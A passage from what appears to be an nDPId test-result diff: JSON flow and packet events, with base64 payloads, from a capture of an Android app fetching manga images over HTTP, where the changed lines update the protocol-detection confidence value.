tgNgZ6r0mazo8zBHxGsefb0MwTbmwQjDY2kww3NvSaEsLApl24xJxfhosx1oMHEsjK\/WXYLJqh89xehVJ0wsVFWjIzRm5GYNYZj6\/oFPk9h9AM7Mh6NIbe5qUdQ482M1rXe8QcD4ayE4Mb\/qSaO7e94N6U6A18FQQ0FuII+Uylg3Oi2nQKUx2iPK5SmgMNiErqLC1RNre2JTMd0EN5goHjE9NFEJZttiV2tWqrlTK2MdPZ174SzaJdXR8byGxj5RxRh+muudfbKwqHxWa322yri6FsXiRyKKszOaHDuMtKROfvbKOIEGKzDaI6ctaZUDKdgtlzpX4+EahI7Ex2+vFIlAxX\/OKTWnD2JPsJVkQD+fUfxD0XAv+sVv9B\/HRQ8\/9DhbWV7Ms+ObRKR92YJfM97sv\/MV4KiFYseCF1tUQdLNXQOyF\/vPpkml1mJEpHYMI4NXlYMED0u8N5VvU8EcgRJahC\/tHHAVJevctSjkda2HEOAkfRIW7IapCjsd5LCdE6OvXeN6UEsbSihOzMsfUEohz7NnAyhPRvexdeISJkeCnr0TnNhyD6rkBVC\/VYpD1FQXCedWJXoe6VPXHMbZzSSTU7G4+tOKk+LKaShiLhwP5WEw=="} 02407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1743,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":3,"flow_last_seen":1654385143362,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1654385143362,"pkt":"nLbQ0+MztKXvZygQCABFAAW+vVcAADsGsBOO+rquwKgCfgBQj3yrRp\/KwbIHhYAQAQWF\/QAAAQEICkxBTaqAUz50UOpj1l8TnRcUCYOetK7VH+KNjxqNgRoSXr7hqvuy0xzJJp3ZN8W2SYsDorqKjXaXpjrtxMefIh2IgGTboR+sbJRWyjtrwbLvgGSpEuWHzaiaAG+fVicKt\/p9eeevPt1wT8hSlTJe4oQruFgqJsRUqj5\/qaqKCpIwWSrXkpcvX5Z\/rL14\/nz1xera8\/UKZ1QhSwqTyWQ\/jAj411dfrL\/YeLb64im\/ZIZ2KgRRGFG75z\/26370Y4pECpZWnz49N0vhUzkd11S5FGTgsbahYfUUiPNShv4p5CgtKU7rq+fhT\/yunYdX9Btkm6IlfbspvO23O9vvj08PLna+frh4vXe89Wp\/57XnED8\/\/75yWreNujfZ6tNqEUU\/lYFle9tqXu50hrRf7j7L9kgN\/LoHero1pC0w6itiJK5pFtr0G7WGHTUYUIpQ3xDo\/rPqM7MkvJF8Q\/vIPhNHN7xUHd85EemATgd39S8+5Fo6eCPtL8UBb1zBCrgJEBjxQ\/yfxgSv\/ER4F036pMUSSFHmG8PPPgE9VQIxUVXhjh+LjF+zRIIqXksIHT753AFTsrYS9dBYWmrQKmf90Jx3pK8P94mzlF\/0XgXGCoEYNeMfBfazJMEMfYisr58DcRMkVROWhkSFuJBkNHI2T\/Qae6TbrMRvCKKaGuEXPVrRAEGSCoEbYZPOc4vkGxMazGhpaWQn7XgIVGGQp\/1ebFylT9eIvtAkaX9ImjAptPAgALnnR4JmHTxhgpmEoCXftU\/bxNCMHjA\/fRmmCO\/7PI9JzdDJGp1ww\/4dzx7hu8q9izXWCGeAhzOMkJJWpsKiRvs9SXqky3COtJBoJWXeiGnB2VCGuEzRQlhZlcISNe
ln7bxqxgDUpDYjer\/CYdSgFsd+k5Zet5klJUCuAAOas\/4qbNaaVnxAaJIOY0ZWTeq3uXllkVWzEK4Sj3pFLNN5SBwRJQo0ruy4pv9iBtMO7Tv3iPhqaU0HShR4qKsQEHmlwbxDxJFhna5S6UZQvaJZWMKZSJSSf1UIWeJruZ3C5STJ1iipLZYridkzDbMEsUb7DcO9eF41DhuAbE1RNmg+sXGIrbR7qKpnDVQBnZvVpNYICZAKxLUYgRPwbjkIKs2QYI3ym\/n8qn0TbRqC9WyzfHPJCO\/N0acDrC5RD0QtHbKYS0tPTns9y77TbvxIMF2mHUZHEJKrlKTNieQakvprD6q\/CMxYsHdCeKYBiXRXmg2YCBlUvmcPkOYH1cV4aekXERBMJJxQQtgqMapARmUhvPmABqVJjXvES4kIfLR0WeaezBad5j+238hPnsSHp3lTIlazuN\/TDlj+DcT\/D1p1LUIClHt6URz1la2WgWS2PNkL72Mru5WhqallRlOgFoi+RkVSU2lGbOXOQzoenoWlpbgoucBiCmp1rYaX3cQuviupxSfQYYnPpkHhhKETsp0cEuIYsPLELpCibT3NNjWs+kOzTeisWWR5e0hjvCegVcOtIU1QNCK06P3GMewRfNIpZBEGsS5EqSezorpWpzcaQog91Qmmmc68y1aSqM6ccrzeI0CZKUjfTjMtCfw7yTa+FIQ0s09ez6gOktyimLmcWgadywvhrETMRzowuIO7o7BcKuG8LBEC1SejWXpJVGaiGND04bvyQ\/q1Cs1DUHu80srOTAenQ3TbpwnCAlWj5eVJHILOByimR0OcShurLBOvALfRV2kBuX4aj7\/R6RVnbKnFrAqYNTtp0y\/icbuAFdHB+CbLE1pHEFQ1CrLdxYyo2wRkea6NGLFX\/VbSVEU5GnbpBJ8jMzjygxxf4x+EKqiuae4GdGD1A1fPqBlsXvCmYnExAQqaBH\/56p4cDCAJGzUvZ0cw9f6E35\/od9ZfO9SZ+XLgs3PoMRdjJP\/m1YYxVdPvBZs="} 01475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1770,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1654385144741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":817,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":817,"pkt_l4_len":783,"thread_ts_msec":1654385144741,"pkt":"tKXvZygQnLbQ0+MzCABFAAMjlA1AAEAGMg\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"} 
01459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1771,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1654385144744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":806,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":806,"pkt_l4_len":772,"thread_ts_msec":1654385144744,"pkt":"tKXvZygQnLbQ0+MzCABFAAMYAsNAAEAGw2TAqAJ+oXUNHbFMAFBD8zDZwu0\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"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1799,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385145219,"flow_last_seen":1654385145219,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385145219,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01174{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1799,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1654385145219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":592,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":592,"pkt_l4_len":558,"thread_ts_msec":1654385145219,"pkt":"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"} 
-01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1799,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385145219,"flow_last_seen":1654385145219,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385145219,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/7e07d4417e0edc98d327d0ddfd3e227a.jpg?format=webp","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1799,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385145219,"flow_last_seen":1654385145219,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385145219,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/7e07d4417e0edc98d327d0ddfd3e227a.jpg?format=webp","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, 
like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1804,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1654385145426,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"thread_ts_msec":1654385145426,"pkt":"nLbQ0+MztKXvZygQCABFAAFR7yVAADYG+mYOiIhswKgCfgBQwMpxJfLZGitp74AYAHpi3wAAAQEICpoJHgAeulLZSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjkuNy40DQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDIzOjI1OjQ1IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS93ZWJwDQpDb250ZW50LUxlbmd0aDogNTE0MTANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0yNTkyMDAwLCBtdXN0LXJldmFsaWRhdGUNCkV0YWc6IDhhODdiMGI5MmUyNTEwNmMzMjliMDZhZjIwNWQwM2ZlMGMxMzQ0MTYNCg0K"} 02470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1805,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1654385145427,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385145427,"pkt":"nLbQ0+MztKXvZygQCABFAAXU7yZAADYG9eIOiIhswKgCfgBQwMpxJfP2Gitp74AQAHr0DwAAAQEICpoJHgAeulLZUklGRsrIAABXRUJQVlA4IL7IAACwgwKdASqyAToCPm0ukkckIiGoKnYMwQANiWNs4jJjEcRbUIq4meIOWNjdqsESz8mAKOq361AtvR7TyuOV\/FV+nu87n88t7L\/y+wvnw+sX\/mdCD\/3\/RT9Gzq4ehu9bb9w8kHll+e9cv5x9n\/s\/8T+6\/+L+Zr9RyV9nP\/f\/sPUr+gfkP+N\/i\/yV+gP+H\/5PDX9i\/rv\/N6hf51\/YP91\/gf3j+PH9Ltt+h\/4\/\/f\/1PsKe\/H3v\/q\/5X8ofjU+\/\/9X+09ZP3T\/W\/+j3BP6f\/c\/+d\/gPc\/\/veKD+d\/4v7f\/AX\/VP8R\/7v9b7wX+P\/9v95\/v\/XH+v\/6P\/4f6v4Hf6J\/e\/+5\/i\/9R78n\/\/94\/7k\/\/P3kf2u\/+aAeCI79ZBcTyL6FXzyW9028ZWAO9Y8tIvqAIrZhjGagOgbNZzx4a6g3twV75qnqJ5twB\/xSo9lyhWqAukiBEUGyCjsjBRJTgwuYIYsVFniixVPbFltIkOLqUYdE93iFQWbjfQ7rIyOY3O5mgQ2g1BiHiZ9
bXVyF0IzVT9VXeN907YTxHk6r5NzA3ch1aLti4lm405dFkbfhla6HiLq7w41FEOShUP3PJLBCrZnBsm0qQk35PgdMzn956e1LpfIDX0FJREMP+uxg3d994VFpfGq86cjUxtVSP\/VQnXBg+DocX7W4D0RyIXgbm8uQ4IzIF2H1sjFucXdojor47tUm9O7eXpNRair3WOKxEZWb\/iXb2Gdx8LFruVjwxae5wQ8X64uRyQlGCU\/MsLFg09o9l7MyDVDZdrr7hCHFleRA42vaN+i4ay+M2WgHNNilmF4lQlpD\/1Da8lz9y5OpfD5ZCskMypGVzwVXUzSXXPcH1xSjpIRnUOSRLgsSqw+WqdbS7avhXOERtYG+yagD03SLlu\/BR\/ZfU\/3gPUWeJZe7VCByIU4208cLe6TVBR15KafU9Q\/xj5lUs9JNPZyUkF56E+AJuZNQBJnlS1a9fO6Diuf3dw3IKITFUh0AdSeLQqpBmoaOhbagSyTYLzhnNCjxfodnJuIkBQlanUOuHTOD+gs05PVNpU3DHxUIfcFt1gasaZ3w1i7zAZSZ63LdYyL9U2tEDVq9IaI2kL0JUh4JlWYuaXYZlW4pCma\/Fdw\/FL\/jAwnb\/BebCkumQFYP1viY59L1oZu5uBXUXUFkbOOnSUg7MPEnnqZjZfMpX0LF0EK4VWYlPgy+y44jS0OUPRSTYo+1AE\/OT+KFCu4C7y\/0unbMhKRion5VmX+5nuPa3a6IcVtwHpZhpAMBfyTfobyM\/iO\/I77R0vOLjKqAf\/fU6WFG4HV+7sPQY02hCYWp+K0qNzoA68F73HIvfAF03DsfxXnu2yp6t2N0K1eVD7O6DfnUmItqYh3PyLZPd5Q\/FLPxQ2pHJVZC4+JG3pg3Dku0is9oPVCW0EgFqU1QhLG95w0MhoSdR370ILv+yujpCB6gPCExiI4GyrfuzXCHzq6CvQmxoFDHDNmRcmg549qdQpED\/RtK9yoBkpxaQ9X\/7hWB5LDO7ZW5tTeh+5UctrqABpjMUqSP997gQPvkdf8NCjy1lYMvVGbDisirszrLGlJOgO3iwZJ0o2P8WQGmUI7PzSPM5Vu4xYpdQj7L372UKH7ioIJNWGWBaj7O3PoZW0hC6TyDtX5M9DRfs8Y61gVLbj287hc1o5LglFp9sXTiZ5OCimSuIzhhbFCbW9ZN2CPHmUCgr\/jteFqfBjH8xDTm01ggd7scl60snvryXBjlpgXsATeRhvUkemJliJ28laLpSLWqqBShAH527w2WjK\/rZ45PZOBjOOIh39ANRjmTK2EMsRJJtZOA8PZ5a\/rb2q1VS8gz50Lm8EcvkppQ6mj6ubw+11r8Mf\/N+U41JXiGxtOmSVZ3lt8bBEKNl8"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146253,"flow_last_seen":1654385146253,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146253,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01158{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1654385146253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":580,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":580,"pkt_l4_len":546,"thread_ts_msec":1654385146253,"pkt":"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"} -01016{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146253,"flow_last_seen":1654385146253,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146253,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49372,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/aec00b1dbdf678ee8d2b89df3fdbd059.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
+01016{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146253,"flow_last_seen":1654385146253,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146253,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49372,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/aec00b1dbdf678ee8d2b89df3fdbd059.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1832,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146263,"flow_last_seen":1654385146263,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146263,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01159{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1832,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1654385146263,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":580,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":580,"pkt_l4_len":546,"thread_ts_msec":1654385146263,"pkt":"tKXvZygQnLbQ0+MzCABFAAI2wylAAEAGG37AqAJ+DoiIbMDaAFBc\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"} -01016{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1832,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146263,"flow_last_seen":1654385146263,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146263,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49370,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/b057f5cd8fe013d2299b57f14faa5fa9.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
+01016{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1832,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146263,"flow_last_seen":1654385146263,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146263,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49370,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/b057f5cd8fe013d2299b57f14faa5fa9.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1833,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146276,"flow_last_seen":1654385146276,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146276,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01158{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1654385146276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":580,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":580,"pkt_l4_len":546,"thread_ts_msec":1654385146276,"pkt":"tKXvZygQnLbQ0+MzCABFAAI2qplAAEAGNA7AqAJ+DoiIbMDkAFAiak7sb7SjVIAYAfZcQwAAAQEICh66VvqaCSFMR0VUIC9tYW5nYS1oYW50L2ltYWdlcy9wcm9qZWN0L2NhcnRvb25zL2YwNTA3NDI1NmIzOTU3MmFkODUyYzFjOTVlYjVmOGE3LmpwZyBIVFRQLzEuMQ0KSG9zdDogaGtibi5jb250ZW50LjFreHVuLmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiBpbWFnZS93ZWJwLGltYWdlL2FwbmcsaW1hZ2UvKiwqLyo7cT0wLjgNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NClJlZmVyZXI6IGh0dHA6Ly9tYW5nYXdlYi4xa3h1bi5tb2JpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQoNCg=="} -01016{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1833,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146276,"flow_last_seen":1654385146276,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146276,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": 
{"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/f05074256b39572ad852c1c95eb5f8a7.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01016{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1833,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146276,"flow_last_seen":1654385146276,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146276,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/f05074256b39572ad852c1c95eb5f8a7.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146276,"flow_last_seen":1654385146276,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385146276,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49412,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01174{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1654385146276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":592,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":592,"pkt_l4_len":558,"thread_ts_msec":1654385146276,"pkt":"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"} -01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146276,"flow_last_seen":1654385146276,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385146276,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49412,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/13aeb81a47e7632ccdf1aefee19ea65e.jpg?format=webp","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
